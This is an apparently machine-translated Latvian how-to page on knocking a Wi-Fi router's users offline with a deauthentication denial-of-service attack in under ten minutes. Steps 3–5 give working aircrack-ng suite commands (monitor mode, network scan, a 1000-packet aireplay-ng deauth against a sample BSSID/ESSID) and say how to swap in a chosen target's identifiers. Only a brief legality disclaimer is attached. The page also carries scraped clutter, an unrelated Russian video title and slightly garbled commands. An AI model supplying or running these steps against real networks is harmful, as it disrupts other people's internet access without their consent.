Satura rādītājs:

Kā izsist maršrutētāju no interneta (mazāk nekā 10 minūtēs): 6 soļi
Kā izsist maršrutētāju no interneta (mazāk nekā 10 minūtēs): 6 soļi

Video: Kā izsist maršrutētāju no interneta (mazāk nekā 10 minūtēs): 6 soļi

Video: Kā izsist maršrutētāju no interneta (mazāk nekā 10 minūtēs): 6 soļi
Video: Штукатурка стен - самое полное видео! Переделка хрущевки от А до Я. #5 2024, Novembris
Anonim
Kā izsist maršrutētāju no interneta (mazāk nekā 10 minūtēs)
Kā izsist maršrutētāju no interneta (mazāk nekā 10 minūtēs)

Šajā apmācībā es jums parādīšu, kā palaist DOS (pakalpojuma atteikuma) uzbrukumu maršrutētājam. Tas neļaus cilvēkiem izmantot maršrutētāju, kuram uzbrūkat.

Sāksim ar XKCD

Šajā apmācībā tiks norādīts tikai tas, kā palaist uzbrukumu pie Linux sistēmas, neļaujiet tam sevi atturēt, ir ļoti viegli palaist Kali Linux tiešo versiju (to, ko es izmantoju (aircrack-ng ir iepriekš instalēta)) vai citu linux distro (ja izmantojat citu linux distro, jums būs jāinstalē aircrack-ng), šeit ir divas vietnes, kas jūs aizvedīs, lai gan palaistu Kali no USB diska https://docs.kali.org/downloading/kali-linux -live-usb-installhttps://24itworld.wordpress.com/2016/12/11/how-to-run-live-kali-linux-from-usb-drive/

Tas var būt nelikumīgi jūsu dzīvesvietā, neveiciet šo uzbrukumu nevienam maršrutētājam, kuram jums nav atļaujas uzbrukt. Tam nevajadzētu kaitēt vai sabojāt maršrutētāju, taču tas var sabojāt maršrutētāju, lietojot uz savu risku.

Izklaidēsimies.

1. darbība. Es neesmu atbildīgs, ja tas notiek

Es neesmu atbildīgs, ja tas notiks
Es neesmu atbildīgs, ja tas notiks

2. solis: video tiem, kas dod priekšroku vienam

Image
Image

3. darbība: iestatiet Wifi adapteri monitora režīmā

Iestatiet Wifi adapteri monitora režīmā
Iestatiet Wifi adapteri monitora režīmā

iwconfig #atrast wifi adaptera nosaukumu

airmon-ng check kill #pārliecinieties, ka airmon-ng nedarbojas

airmon-ng start wlan0 #start airman-ng un iestatiet wlan0 uz monitora režīmu (nomainiet wlan0 ar sava wifi adaptera nosaukumu)

4. darbība. Atrodiet pieejamos tīklus

Atrodiet pieejamos tīklus
Atrodiet pieejamos tīklus

iwconfig #find wifi adaptera nosaukums (manā gadījumā tas bija mainīts uz wlan0mon)

airodump-ng wlan0mon #Pārraugiet pieejamos tīklus, izmantojot wlan0mon (nomainiet wlan0mon ar sava wifi adaptera nosaukumu)

5. darbība: nosūtiet nevēlamās paketes

Nosūtiet nevēlamās paketes
Nosūtiet nevēlamās paketes
Nosūtiet nevēlamās paketes
Nosūtiet nevēlamās paketes

Šeit ir pēdējā pavēle

airplay -ng -deauth 1000 -a C0: 56: 27: 4A: 3F: B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon

Tagad es paskaidrošu, ko dara katra šīs komandas daļa

airplay-ng-deauth 1000 #šī daļa nosūta 1000 nevēlamās paketes

-a C0: 56: 27: 4A: 3F: B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon #Nosūtiet šīs paketes maršrutētājam ar BSSID "C0: 56: 27: 4A: 3F: B2" un ESSID "NETGEAR94 2.4GHz_Ext"

Nomainiet BSSID un ESSID ar tā maršrutētāja BSSID un ESSID, kuram vēlaties uzbrukt.

nosūtīt šīs paketes, izmantojot wifi adapteri "wlan0mon" (aizstājiet wlan0mon ar sava wifi adaptera nosaukumu)

6. darbība: panākumi

Veiksmi!
Veiksmi!

Tas ir tik vienkārši.

Lai pārtrauktu pakešu sūtīšanu, nospiediet CTL+C vai aizveriet termināli.

Lai atkārtotu pēdējo komandu, nospiediet augšupvērsto bultiņu un pēc tam ievadiet.

Šeit ir Aircrack-ng vietne

Ieteicams: